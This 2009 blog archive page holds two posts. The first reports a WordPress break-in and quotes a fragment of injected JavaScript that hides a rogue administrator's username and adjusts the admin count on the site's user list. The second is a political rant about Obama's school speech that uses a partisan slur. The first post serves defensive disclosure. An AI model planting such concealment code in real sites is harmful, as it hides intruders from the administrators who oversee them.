September | 2009 | /usr/local.com

WordPress Security Concern

September 13th, 2009 | by matt | security, sysadmin

Sep
13

I’m not sure if you’ve applied the latest updates for wordpress but I did last week. However, it appears that someone got in to one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3 as they were in when that was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit on the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peaking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);

Its not formatted the greatest, but basically, it hides the username from the list. Nice eh! Simply deleting this entry made the user show up in the user list where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had starting defacing the site or hiding other gems on there.

-Matt

Comments Closed

Responsiblity, Hard Work, Commitment

September 7th, 2009 | by matt | politics, rants

Sep
07

Have we forgotten already who Barack Obama is? It seems that we have. Apparently President Obama is giving a speech tomorrow to kids across the country in K-12 schools. He’s talking about responsibility, hard work and commitment. You know, the values that our country holds near and dear to our hearts. Core values that each and every one of us should celebrate in our children.

Yet, apparently there is a bit of controversy. Many parents are going to hold their kids out from school tomorrow so they miss the 20 minute speech. They’re concerned that the President of the United States of America is going to spread a bi-partisan message to their children. Hello! ARE YOU LIVING ON THE SAME FREAKING PLANET!?!? Missing all day in order to not have your child here a 20 minute speech on responsiblity, hard work and commitment. A message about staying in school and doing the best that you can each and every day. THIS, this is the big controversy?

I’m at a loss. Apparently I’m not alone.

To combat the conservatards (yes, that’s the new name from the far right wing conservatives), the White House has issued the text of the speech. It can be found here

While I have disagreed with many past Presidents on a variety of issues, I feel that there should always be a level of respect given to the office no matter who is sitting there regardless of their political affiliation. He’s the President of the United States of America. Your America, my America, OUR America! One Nation, Under God! Does any of this ring a bell?

So let’s all calm down for a minute. Take a breath and realize that President Obama is going to do what George Bush, Ronald Reagan and many many others have done before him. He’s going to have a speech for the students tomorrow encouraging them to take responsibility, work hard, and stay in school. I hope that many of you that are thinking about keeping your kids out of school take the high road and make sure that they get their butts in school.

Comments Closed